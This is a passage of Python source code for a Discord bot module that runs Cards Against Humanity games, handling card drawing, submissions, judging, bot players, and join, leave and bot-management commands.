sub["By"] == judge: # Found it! 
game["Submitted"].remove(sub) break if member["IsBot"]: if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None else: await member["User"].send( f"**You were removed from game id:** ***{game["ID"]}.***" ) # Removed, no need to finish the loop break if not outcome: return outcome # We removed someone - let's tell the world for member in game["Members"]: if member["IsBot"]: continue if removed["IsBot"]: msg = f"***{self.botName} ({removed["ID"]})*** **left the game - reorganizing...**" else: msg = f"***{self.displayname(removed["User"])}*** **left the game - reorganizing...**" # Check if the judge changed if judgeChanged: # Judge changed newJudge = game["Members"][game["Judge"]] if newJudge["IsBot"]: msg += f"\n\n***{self.botName} ({newJudge["ID"]})*** **is now judging!**" # Schedule judging task else: if newJudge == member: msg += "\n\n***YOU*** **are now judging!**" else: msg += f"\n\n***{newJudge["User"]}*** **is now judging!**" await member["User"].send(msg) return game def checkGame(self, game): for member in game["Members"]: if not member["IsBot"]: return True # If we got here - only bots, or empty game # Kill all bots' loops for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None # Set running to false game["Running"] = False self.games.remove(game) return False async def typing(self, game, typeTime=5): # Allows us to show the bot typing waitTime = random.randint(self.botWaitMin, self.botWaitMax) preType = waitTime - typeTime if preType > 0: await asyncio.sleep(preType) for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(typeTime) else: for member in game["Members"]: if member["IsBot"]: continue await asyncio.sleep(0.1) await asyncio.sleep(waitTime) async def botPick(self, ctx, bot, game): # Has the bot pick their card blackNum = game["BlackCard"]["Pick"] if blackNum == 1: cardSpeak = "card" else: cardSpeak = "cards" i = 0 cards = [] while i < blackNum: randCard = random.randint(0, len(bot["Hand"]) - 1) cards.append(bot["Hand"].pop(randCard)["Text"]) i += 1 await self.typing(game) # Make sure we haven't laid any cards if bot["Laid"] == False and game["Judging"] == False: newSubmission = {"By": bot, "Cards": cards} game["Submitted"].append(newSubmission) # Shuffle cards shuffle(game["Submitted"]) bot["Laid"] = True game["Time"] = currentTime = int(time.time()) await self.checkSubmissions(ctx, game, bot) async def botPickWin(self, ctx, game): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: # Judge is a bot - and all cards are in! await self.typing(game) # Pick a winner winner = random.randint(0, totalUsers - 1) await self.winningCard(ctx, game, winner) async def checkSubmissions(self, ctx, game, user=None): totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) for member in game["Members"]: msg = "" # Is the game running? if len(game["Members"]) < self.minMembers: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): # Task isn't finished - we're on a new hand, cancel it task.cancel() member["Task"] = None continue # not enough members - send the embed stat_embed = discord.Embed(color=discord.Color.red()) stat_embed.set_author( name=f"Not enough players to continue! 
({len(game["Members"])}/{self.minMembers})" ) stat_embed.set_footer( text=f"Have other users join with: {ctx.prefix}joincah {game["ID"]}" ) await member["User"].send(embed=stat_embed) continue if member["IsBot"] == True: continue # Check if we have a user if user: blackNum = game["BlackCard"]["Pick"] if blackNum == 1: card = "card" else: card = "cards" if user["IsBot"]: msg = f"*{self.botName} ({user["ID"]})* submitted their {card}! " else: if not member == user: # Don't say this to the submitting user msg = f"*{self.displayname(user["User"])}* submitted their {card}! " if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." if len(msg): # We have something to say await member["User"].send(msg) async def checkCards(self, ctx, game): while True: if not game["Running"]: break # wait for 1 second await asyncio.sleep(1) # Check for all cards if len(game["Members"]) < self.minMembers: # Not enough members continue # Enough members - let's check if we're judging if game["Judging"]: continue # Enough members, and not judging - let's check cards totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if submitted >= totalUsers: game["Judging"] = True # We have enough cards for member in game["Members"]: if member["IsBot"]: continue msg = "All cards have been submitted!" # if await member["User"].send(msg) await self.showOptions(ctx, member["User"]) # Check if a bot is the judge judge = game["Members"][game["Judge"]] if not judge["IsBot"]: continue # task = self.bot.loop.create_task(self.botPickWin(ctx, game)) task = asyncio.ensure_future(self.botPickWin(ctx, game)) judge["Task"] = task async def winningCard(self, ctx, game, card): # Let's pick our card and alert everyone winner = game["Submitted"][card] if winner["By"]["IsBot"]: winnerName = f"{self.botName} ({winner["By"]["ID"]})" winner["By"]["Points"] += 1 winner["By"]["Won"].append(game["BlackCard"]["Text"]) else: winnerName = self.displayname(winner["By"]["User"]) for member in game["Members"]: if member["IsBot"]: continue stat_embed = discord.Embed(color=discord.Color.gold()) stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") index = game["Members"].index(member) if index == game["Judge"]: stat_embed.set_author(name=f"You picked {winnerName}'s card!") elif member == winner["By"]: stat_embed.set_author(name="YOU WON!!") member["Points"] += 1 member["Won"].append(game["BlackCard"]["Text"]) else: stat_embed.set_author(name=f"{winnerName} won!") if len(winner["Cards"]) == 1: msg = "The **Winning** card was:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) else: msg = "The **Winning** cards were:\n\n{}".format( "{}".format(" - ".join(winner["Cards"])) ) await member["User"].send(embed=stat_embed) await member["User"].send(msg) await asyncio.sleep(0.1) # await self.nextPlay(ctx, game) # Start the game loop event = game["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) game["Time"] = currentTime = int(time.time()) async def gameCheckLoop(self, ctx, game): task = game["NextHand"] while True: if not game["Running"]: break # Clear the pending task task.clear() # Queue up the next hand await self.nextPlay(ctx, game) # Wait until our next clear await task.wait() async def messagePlayers(self, ctx, message, game, judge=False): # Messages all the users on in a game for member in game["Members"]: if member["IsBot"]: continue # Not bots if member is game["Members"][game["Judge"]]: # Is the judge if judge: await member["User"].send(message) else: # Not the judge await 
member["User"].send(message) ################################################ async def showPlay(self, ctx, user): # Creates an embed and displays the current game stats stat_embed = discord.Embed(color=discord.Color.blue()) game = await self.userGame(user) if not game: return # Get the judge's name if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game["Members"][game["Judge"]]["ID"]})* is" else: judge = f"*{self.displayname(game["Members"][game["Judge"]]["User"])}* is" # Get the Black Card try: blackCard = game["BlackCard"]["Text"] blackNum = game["BlackCard"]["Pick"] except Exception: blackCard = "None." blackNum = 0 msg = f"{judge} the judge.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" totalUsers = len(game["Members"]) - 1 submitted = len(game["Submitted"]) if len(game["Members"]) >= self.minMembers: if submitted < totalUsers: msg += f"{submitted}/{totalUsers} cards submitted..." else: msg += "All cards have been submitted!" await self.showOptions(ctx, user) return if not judge == "**YOU** are": # Judge doesn't need to lay a card if blackNum == 1: # Singular msg += f"\n\nLay a card with `{ctx.prefix}lay [card number]`" elif blackNum > 1: # Plural msg += f"\n\nLay **{blackNum} cards** with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`" stat_embed.set_author(name="Current Play") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) await user.send(msg) async def showHand(self, ctx, user): # Shows the user's hand in an embed stat_embed = discord.Embed(color=discord.Color.green()) game = await self.userGame(user) if not game: return i = 0 msg = "" points = "? points" for member in game["Members"]: if member["ID"] == user.id: # Got our user if member["Points"] == 1: points = "1 point" else: points = f"{member["Points"]} points" for card in member["Hand"]: i += 1 msg += f"{i}. {card["Text"]}\n" try: blackCard = f"**{game["BlackCard"]["Text"]}**" except Exception: blackCard = "**None.**" stat_embed.set_author(name=f"Your Hand - {points}") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) await user.send(msg) async def showOptions(self, ctx, user): # Shows the judgement options stat_embed = discord.Embed(color=discord.Color.orange()) game = await self.userGame(user) if not game: return # Add title stat_embed.set_author(name="JUDGEMENT TIME!!") stat_embed.set_footer(text=f"Cards Against Humanity - id: {game["ID"]}") await user.send(embed=stat_embed) if game["Members"][game["Judge"]]["User"] == user: judge = "**YOU** are" else: if game["Members"][game["Judge"]]["IsBot"]: # Bot judge = f"*{self.botName} ({game["Members"][game["Judge"]]["ID"]})* is" else: judge = f"*{self.displayname(game["Members"][game["Judge"]]["User"])}* is" blackCard = game["BlackCard"]["Text"] msg = f"{judge} judging.\n\n" msg += f"__Black Card:__\n\n**{blackCard}**\n\n" msg += "__Submitted White Cards:__\n\n" i = 0 for sub in game["Submitted"]: i += 1 msg += "{}. {}\n".format(i, " - ".join(sub["Cards"])) if judge == "**YOU** are": msg += f"\nPick a winner with `{ctx.prefix}pick [submission number]`." 
        await user.send(msg)

    async def drawCard(self, game):
        with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file:
            deck = json.load(deck_file)
        # Draws a random unused card and shuffles the deck if needed
        totalDiscard = len(game["Discard"])
        for member in game["Members"]:
            totalDiscard += len(member["Hand"])
        if totalDiscard >= len(deck["whiteCards"]):
            # Tell everyone the cards were shuffled
            for member in game["Members"]:
                if member["IsBot"]:
                    continue
                user = member["User"]
                await user.send("Shuffling white cards...")
            # Shuffle the cards
            self.shuffle(game)
        while True:
            # Random grab a unique card
            index = random.randint(0, len(deck["whiteCards"]) - 1)
            if not index in game["Discard"]:
                game["Discard"].append(index)
                text = deck["whiteCards"][index]
                text = self.cleanJson(text)
                card = {"Index": index, "Text": text}
                return card

    def shuffle(self, game):
        # Adds discards back into the deck
        game["Discard"] = []
        for member in game["Members"]:
            for card in member["Hand"]:
                game["Discard"].append(card["Index"])

    async def drawCards(self, user, cards=10):
        if not len(str(user)) == 4:
            if not type(user) is int:
                # Assume it's a discord.Member/User
                user = user.id
        # fills the user's hand up to number of cards
        game = await self.userGame(user)
        for member in game["Members"]:
            if member["ID"] == user:
                # Found our user - let's draw cards
                i = len(member["Hand"])
                while i < cards:
                    # Draw unique cards until we fill our hand
                    newCard = await self.drawCard(game)
                    member["Hand"].append(newCard)
                    i += 1

    async def drawBCard(self, game):
        with open(str(bundled_data_path(self)) + "/deck.json", "r") as deck_file:
            deck = json.load(deck_file)
        # Draws a random black card
        totalDiscard = len(game["BDiscard"])
        if totalDiscard >= len(deck["blackCards"]):
            # Tell everyone the cards were shuffled
            for member in game["Members"]:
                if member["IsBot"]:
                    continue
                user = member["User"]
                await user.send("Shuffling black cards...")
            # Shuffle the cards
            game["BDiscard"] = []
        while True:
            # Random grab a unique card
            index = random.randint(0, len(deck["blackCards"]) - 1)
            if not index in game["BDiscard"]:
                game["BDiscard"].append(index)
                text = deck["blackCards"][index]["text"]
                text = self.cleanJson(text)
                game["BlackCard"] = {"Text": text, "Pick": deck["blackCards"][index]["pick"]}
                return game["BlackCard"]

    async def nextPlay(self, ctx, game):
        # Advances the game
        if len(game["Members"]) < self.minMembers:
            stat_embed = discord.Embed(color=discord.Color.red())
            stat_embed.set_author(
                name=f"Not enough players to continue! ({len(game['Members'])}/{self.minMembers})"
            )
            stat_embed.set_footer(
                text=f"Have other users join with: {ctx.prefix}joincah {game['ID']}"
            )
            for member in game["Members"]:
                if member["IsBot"]:
                    continue
                await member["User"].send(embed=stat_embed)
            return
        # Find if we have a winner
        winner = False
        stat_embed = discord.Embed(color=discord.Color.lighter_grey())
        for member in game["Members"]:
            if member["IsBot"]:
                # Clear pending tasks and set to None
                if not member["Task"] == None:
                    task = member["Task"]
                    if not task.done():
                        # Task isn't finished - we're on a new hand, cancel it
                        task.cancel()
                    member["Task"] = None
            if member["Points"] >= self.winAfter:
                # We have a winner!
                winner = True
                if member["IsBot"]:
                    stat_embed.set_author(name=f"{self.botName} ({member['ID']}) is the WINNER!!")
                else:
                    stat_embed.set_author(
                        name=f"{self.displayname(member['User'])} is the WINNER!!"
                    )
                stat_embed.set_footer(text="Congratulations!")
                break
        if winner:
            for member in game["Members"]:
                if not member["IsBot"]:
                    await member["User"].send(embed=stat_embed)
                # Reset all users
                member["Hand"] = []
                member["Points"] = 0
                member["Won"] = []
                member["Laid"] = False
                member["Refreshed"] = False
            return
        game["Judging"] = False
        # Clear submitted cards
        game["Submitted"] = []
        # We have enough members
        if game["Judge"] == -1:
            # First game - randomize judge
            game["Judge"] = random.randint(0, len(game["Members"]) - 1)
        else:
            game["Judge"] += 1
        # Reset the judge if out of bounds
        if game["Judge"] >= len(game["Members"]):
            game["Judge"] = 0
        # Draw the next black card
        bCard = await self.drawBCard(game)
        # Draw cards
        for member in game["Members"]:
            member["Laid"] = False
            await self.drawCards(member["ID"])
        # Show hands
        for member in game["Members"]:
            if member["IsBot"]:
                continue
            await self.showPlay(ctx, member["User"])
            index = game["Members"].index(member)
            if not index == game["Judge"]:
                await self.showHand(ctx, member["User"])
            await asyncio.sleep(0.1)
        # Have the bots lay their cards
        for member in game["Members"]:
            if not member["IsBot"]:
                continue
            if member["ID"] == game["Members"][game["Judge"]]["ID"]:
                continue
            # Not a human player, and not the judge
            # task = self.bot.loop.create_task(self.botPick(ctx, member, game))
            task = asyncio.ensure_future(self.botPick(ctx, member, game))
            member["Task"] = task
            # await self.botPick(ctx, member, game)

    @commands.command()
    async def game(self, ctx, *, message=None):
        """Displays the game's current status."""
        if not await self.checkPM(ctx.message):
            return
        userGame = await self.userGame(ctx.author)
        if not userGame:
            msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            return await ctx.author.send(msg)
        await self.showPlay(ctx, ctx.author)

    @commands.command()
    async def chat(self, ctx, *, message=None):
        """Broadcasts a message to the other players in your game."""
        if not await self.checkPM(ctx.message):
            return
        userGame = await self.userGame(ctx.author)
        if not userGame:
            msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            return await ctx.author.send(msg)
        userGame["Time"] = int(time.time())
        if message == None:
            msg = "Ooookay, you say *nothing...*"
            return await ctx.author.send(msg)
        msg = f"*{ctx.author.name}* says: {message}"
        for member in userGame["Members"]:
            if member["IsBot"]:
                continue
            # Tell them all!!
            if not member["User"] == ctx.author:
                # Don't tell yourself
                await member["User"].send(msg)
            else:
                # Update member's time
                member["Time"] = int(time.time())
        await ctx.author.send("Message sent!")

    @commands.command()
    async def lay(self, ctx, *, card=None):
        """Lays a card or cards from your hand. If multiple cards are needed, separate them by a comma (1,2,3)."""
        if not await self.checkPM(ctx.message):
            return
        userGame = await self.userGame(ctx.author)
        if not userGame:
            msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            return await ctx.author.send(msg)
        userGame["Time"] = int(time.time())
        for member in userGame["Members"]:
            if member["User"] == ctx.author:
                member["Time"] = int(time.time())
                user = member
                index = userGame["Members"].index(member)
                if index == userGame["Judge"]:
                    await ctx.author.send(
                        "You're the judge. You don't get to lay cards this round."
                    )
                    return
        for submit in userGame["Submitted"]:
            if submit["By"]["User"] == ctx.author:
                await ctx.author.send("You already made your submission this round.")
                return
        if card == None:
            await ctx.author.send("You need to input *something.*")
            return
        card = card.strip()
        card = card.replace(" ", "")
        # Not the judge
        if len(userGame["Members"]) < self.minMembers:
            stat_embed = discord.Embed(color=discord.Color.red())
            stat_embed.set_author(
                name=f"Not enough players to continue! ({len(userGame['Members'])}/{self.minMembers})"
            )
            stat_embed.set_footer(
                text=f"Have other users join with: {ctx.prefix}joincah {userGame['ID']}"
            )
            return await ctx.author.send(embed=stat_embed)
        numberCards = userGame["BlackCard"]["Pick"]
        cards = []
        if numberCards > 1:
            cardSpeak = "cards"
            try:
                card = card.split(",")
            except Exception:
                card = []
            if not len(card) == numberCards:
                await ctx.author.send(
                    f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                )
                return await self.showHand(ctx, ctx.author)
            # Got something
            # Check for duplicates
            if not len(card) == len(set(card)):
                await ctx.author.send(
                    f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                )
                return await self.showHand(ctx, ctx.author)
            # Works
            for c in card:
                try:
                    c = int(c)
                except Exception:
                    await ctx.author.send(
                        f"You need to lay **{numberCards} cards** (no duplicates) with `{ctx.prefix}lay [card numbers separated by commas (1,2,3)]`"
                    )
                    return await self.showHand(ctx, ctx.author)
                if c < 1 or c > len(user["Hand"]):
                    await ctx.author.send(
                        f"Card numbers must be between 1 and {len(user['Hand'])}."
                    )
                    return await self.showHand(ctx, ctx.author)
                cards.append(user["Hand"][c - 1]["Text"])
            # Remove from user's hand
            card = sorted(card, key=lambda card: int(card), reverse=True)
            for c in card:
                user["Hand"].pop(int(c) - 1)
            # Valid cards
            newSubmission = {"By": user, "Cards": cards}
        else:
            cardSpeak = "card"
            try:
                card = int(card)
            except Exception:
                await ctx.author.send(
                    f"You need to lay a valid card with `{ctx.prefix}lay [card number]`"
                )
                return await self.showHand(ctx, ctx.author)
            if card < 1 or card > len(user["Hand"]):
                await ctx.author.send(f"Card numbers must be between 1 and {len(user['Hand'])}.")
                return await self.showHand(ctx, ctx.author)
            # Valid card
            newSubmission = {"By": user, "Cards": [user["Hand"].pop(card - 1)["Text"]]}
        userGame["Submitted"].append(newSubmission)
        # Shuffle cards
        shuffle(userGame["Submitted"])
        user["Laid"] = True
        await ctx.author.send(f"You submitted your {cardSpeak}!")
        await self.checkSubmissions(ctx, userGame, user)

    @commands.command()
    async def pick(self, ctx, *, card=None):
        """As the judge - pick the winning card(s)."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            msg = f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            return await ctx.author.send(msg)
        userGame["Time"] = int(time.time())
        isJudge = False
        for member in userGame["Members"]:
            if member["User"] == ctx.author:
                member["Time"] = int(time.time())
                user = member
                index = userGame["Members"].index(member)
                if index == userGame["Judge"]:
                    isJudge = True
        if not isJudge:
            msg = "You're not the judge - I guess you'll have to wait your turn."
            return await ctx.author.send(msg)
        # Am judge
        totalUsers = len(userGame["Members"]) - 1
        submitted = len(userGame["Submitted"])
        if submitted < totalUsers:
            if totalUsers - submitted == 1:
                msg = "Still waiting on 1 card..."
            else:
                msg = f"Still waiting on {totalUsers - submitted} cards..."
            await ctx.author.send(msg)
            return
        try:
            card = int(card) - 1
        except Exception:
            card = -1
        if card < 0 or card >= totalUsers:
            return await ctx.author.send(f"Your pick must be between 1 and {totalUsers}.")
        # Pick is good!
        await self.winningCard(ctx, userGame, card)

    @commands.command()
    async def hand(self, ctx):
        """Shows your hand."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        await self.showHand(ctx, ctx.author)
        userGame["Time"] = int(time.time())

    @commands.command()
    async def newcah(self, ctx):
        """Starts a new Cards Against Humanity game."""
        # if not await self.checkPM(ctx.message):
        #     return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if userGame:
            # Already in a game
            return await ctx.author.send(
                f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game."
            )
        # Not in a game - create a new one
        gameID = self.randomID()
        currentTime = int(time.time())
        newGame = {
            "ID": gameID,
            "Members": [],
            "Discard": [],
            "BDiscard": [],
            "Judge": -1,
            "Time": currentTime,
            "BlackCard": None,
            "Submitted": [],
            "NextHand": asyncio.Event(),
            "Judging": False,
            "Timeout": True,
        }
        member = {
            "ID": ctx.author.id,
            "User": ctx.author,
            "Points": 0,
            "Won": [],
            "Hand": [],
            "Laid": False,
            "Refreshed": False,
            "IsBot": False,
            "Creator": True,
            "Task": None,
            "Time": currentTime,
        }
        newGame["Members"].append(member)
        newGame["Running"] = True
        task = self.bot.loop.create_task(self.gameCheckLoop(ctx, newGame))
        task = self.bot.loop.create_task(self.checkCards(ctx, newGame))
        self.games.append(newGame)
        # Tell the user they created a new game and list its ID
        await ctx.message.channel.send(f"You created game id: *{gameID}*")
        await self.drawCards(ctx.author)
        # await self.showHand(ctx, ctx.author)
        # await self.nextPlay(ctx, newGame)

    @commands.command()
    async def leavecah(self, ctx):
        """Leaves the current game you're in."""
        removeCheck = await self.removeMember(ctx.author)
        if not removeCheck:
            msg = "You are not in a game."
            await ctx.message.channel.send(msg)
            return
        if self.checkGame(removeCheck):
            # await self.nextPlay(ctx, removeCheck)
            """# Start the game loop
            event = removeCheck['NextHand']
            self.bot.loop.call_soon_threadsafe(event.set)"""
            # Player was removed - try to handle it calmly...
            await self.checkSubmissions(ctx, removeCheck)

    @commands.command()
    async def joincah(self, ctx, *, id=None):
        """Join a Cards Against Humanity game. If no id or user is passed, joins a random game."""
        # if not await self.checkPM(ctx.message):
        #     return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        isCreator = False
        if userGame:
            # Already in a game
            return await ctx.message.channel.send(
                f"You're already in a game (id: *{userGame['ID']}*)\nType `{ctx.prefix}leavecah` to leave that game."
            )
        if len(self.games):
            if id:
                game = self.gameForID(id)
                if game == None:
                    # That id doesn't exist - or is possibly a user
                    # If user, has to be joined from server chat
                    if not ctx.message.guild:
                        return await ctx.message.channel.send(
                            f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user."
                        )
                    else:
                        # We have a server - let's try for a user
                        member = self.memberforname(id, ctx.message.guild)
                        if not member:
                            # Couldn't find user!
                            return await ctx.message.channel.send(
                                f"I couldn't find a game attached to that id. If you are trying to join a user - run the `{ctx.prefix}joincah [user]` command in a channel on a server you share with that user."
                            )
                        # Have a user - check if they're in a game
                        game = await self.userGame(member)
                        if not game:
                            # That user is NOT in a game!
                            return await ctx.message.channel.send(
                                "That user doesn't appear to be playing."
                            )
            else:
                game = random.choice(self.games)
        else:
            # No games - create a new one
            gameID = self.randomID()
            currentTime = int(time.time())
            game = {
                "ID": gameID,
                "Members": [],
                "Discard": [],
                "BDiscard": [],
                "Judge": -1,
                "Time": currentTime,
                "BlackCard": None,
                "Submitted": [],
                "NextHand": asyncio.Event(),
                "Judging": False,
                "Timeout": True,
            }
            game["Running"] = True
            task = self.bot.loop.create_task(self.gameCheckLoop(ctx, game))
            task = self.bot.loop.create_task(self.checkCards(ctx, game))
            self.games.append(game)
            # Tell the user they created a new game and list its ID
            await ctx.message.channel.send(f"**You created game id:** ***{gameID}***")
            isCreator = True
        # Tell everyone else you joined
        for member in game["Members"]:
            if member["IsBot"]:
                continue
            await member["User"].send(f"***{self.displayname(ctx.author)}*** **joined the game!**")
        # We got a user!
        currentTime = int(time.time())
        member = {
            "ID": ctx.author.id,
            "User": ctx.author,
            "Points": 0,
            "Won": [],
            "Hand": [],
            "Laid": False,
            "Refreshed": False,
            "IsBot": False,
            "Creator": isCreator,
            "Task": None,
            "Time": currentTime,
        }
        game["Members"].append(member)
        await self.drawCards(ctx.author)
        if len(game["Members"]) == 1:
            # Just created the game
            await self.drawCards(ctx.author)
        else:
            await ctx.message.channel.send(
                f"**You've joined game id:** ***{game['ID']}!***\n\nThere are *{len(game['Members'])} users* in this game."
            )
        # Check if adding put us at minimum members
        if len(game["Members"]) - 1 < self.minMembers:
            # It was - *actually* start a game
            event = game["NextHand"]
            self.bot.loop.call_soon_threadsafe(event.set)
        else:
            # It was not - just incorporate new players
            await self.checkSubmissions(ctx, game)
            # Reset judging flag to retrigger actions
            game["Judging"] = False
            # Show the user the current card and their hand
            await self.showPlay(ctx, member["User"])
            await self.showHand(ctx, member["User"])
        event = game["NextHand"]
        game["Time"] = int(time.time())

    @commands.command()
    async def joinbot(self, ctx):
        """Adds a bot to the game. Can only be done by the player who created the game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") # We can get another bot! botID = self.randomBotID(userGame) lobot = { "ID": botID, "User": None, "Points": 0, "Won": [], "Hand": [], "Laid": False, "Refreshed": False, "IsBot": True, "Creator": False, "Task": None, } userGame["Members"].append(lobot) await self.drawCards(lobot["ID"]) for member in userGame["Members"]: if member["IsBot"]: continue await member["User"].send(f"***{self.botName} ({botID})*** **joined the game!**") # await self.nextPlay(ctx, userGame) # Check if adding put us at minimum members if len(userGame["Members"]) - 1 < self.minMembers: # It was - *actually* start a game event = userGame["NextHand"] self.bot.loop.call_soon_threadsafe(event.set) else: # It was not - just incorporate new players await self.checkSubmissions(ctx, userGame) # Reset judging flag to retrigger actions userGame["Judging"] = False # Schedule stuff task = asyncio.ensure_future(self.botPick(ctx, lobot, userGame)) lobot["Task"] = task @commands.command() async def joinbots(self, ctx, number=None): """Adds bots to the game. Can only be done by the player who created the game.""" if not await self.checkPM(ctx.message): return # Check if the user is already in game userGame = await self.userGame(ctx.author) if not userGame: # Not in a game return await ctx.author.send( f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`." ) botCount = 0 for member in userGame["Members"]: if member["IsBot"]: botCount += 1 continue if member["User"] == ctx.author: if not member["Creator"]: # You didn't make this game msg = "Only the player that created the game can add bots." await ctx.author.send(msg) return member["Time"] = int(time.time()) if number == None: # No number specified - let's add the max number of bots number = self.maxBots - botCount try: number = int(number) except Exception: msg = "Number of bots to add must be an integer." await ctx.author.send(msg) return # We are the creator - let's check the number of bots if botCount >= self.maxBots: # Too many bots! return await ctx.author.send(f"You already have enough bots (max is {self.maxBots}).") if number > (self.maxBots - botCount): number = self.maxBots - botCount if number == 1: msg = f"**Adding {number} bot:**\n\n" else: msg = f"**Adding {number} bots:**\n\n" newBots = [] for i in range(0, number): # We can get another bot! 
            botID = self.randomBotID(userGame)
            lobot = {
                "ID": botID,
                "User": None,
                "Points": 0,
                "Won": [],
                "Hand": [],
                "Laid": False,
                "Refreshed": False,
                "IsBot": True,
                "Creator": False,
                "Task": None,
            }
            userGame["Members"].append(lobot)
            newBots.append(lobot)
            await self.drawCards(lobot["ID"])
            msg += f"***{self.botName} ({botID})*** **joined the game!**\n"
        # await self.nextPlay(ctx, userGame)
        for member in userGame["Members"]:
            if member["IsBot"]:
                continue
            await member["User"].send(msg)
        # Check if adding put us at minimum members
        if len(userGame["Members"]) - number < self.minMembers:
            # It was - *actually* start a game
            event = userGame["NextHand"]
            self.bot.loop.call_soon_threadsafe(event.set)
        else:
            # It was not - just incorporate new players
            await self.checkSubmissions(ctx, userGame)
            # Reset judging flag to retrigger actions
            userGame["Judging"] = False
            for bot in newBots:
                # Schedule stuff
                task = asyncio.ensure_future(self.botPick(ctx, bot, userGame))
                bot["Task"] = task

    @commands.command()
    async def removebot(self, ctx, *, id=None):
        """Removes a bot from the game. Can only be done by the player who created the game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
                f"You're not in a game - you can create one with `{ctx.prefix}newcah` or join one with `{ctx.prefix}joincah`."
            )
        botCount = 0
        for member in userGame["Members"]:
            if member["IsBot"]:
                botCount += 1
                continue
            if member["User"] == ctx.author:
                if not member["Creator"]:
                    # You didn't make this game
                    return await ctx.author.send(
                        "Only the player that created the game can remove bots."
                    )
                member["Time"] = int(time.time())
        # We are the creator - let's check the number of bots
        if id == None:
            # Just remove the first bot we find
            for member in userGame["Members"]:
                if member["IsBot"]:
                    await self.removeMember(member["ID"])
                    """# Start the game loop
                    event = userGame['NextHand']
                    self.bot.loop.call_soon_threadsafe(event.set)"""
                    # Bot was removed - try to handle it calmly...
                    return await self.checkSubmissions(ctx, userGame)
            msg = "No bots to remove!"
            await ctx.author.send(msg)
            return
        else:
            # Remove a bot by id
            if not await self.removeMember(id):
                # not found
                return await ctx.author.send(
                    f"I couldn't locate that bot on this game. If you're trying to remove a player, try the `{ctx.prefix}removeplayer [name]` command."
                )
        # await self.nextPlay(ctx, userGame)
        """# Start the game loop
        event = userGame['NextHand']
        self.bot.loop.call_soon_threadsafe(event.set)"""
        # Bot was removed - let's try to handle it calmly...
        await self.checkSubmissions(ctx, userGame)

    @commands.command()
    async def cahgames(self, ctx):
        """Displays up to 10 CAH games in progress."""
        shuffledGames = list(self.games)
        random.shuffle(shuffledGames)
        if not len(shuffledGames):
            await ctx.message.channel.send("No games being played currently.")
            return
        max = 10
        if len(shuffledGames) < 10:
            max = len(shuffledGames)
        msg = "__Current CAH Games__:\n\n"
        for i in range(0, max):
            playerCount = 0
            botCount = 0
            gameID = shuffledGames[i]["ID"]
            for j in shuffledGames[i]["Members"]:
                if j["IsBot"]:
                    botCount += 1
                else:
                    playerCount += 1
            botText = f"{botCount} bot"
            if not botCount == 1:
                botText += "s"
            playerText = f"{playerCount} player"
            if not playerCount == 1:
                playerText += "s"
            msg += f"{i + 1}. {gameID} - {playerText} | {botText}\n"
        await ctx.message.channel.send(msg)

    @commands.command()
    async def score(self, ctx):
        """Display the score of the current game."""
        if not await self.checkPM(ctx.message):
            return
        # Check if the user is already in game
        userGame = await self.userGame(ctx.author)
        if not userGame:
            # Not in a game
            return await ctx.author.send(
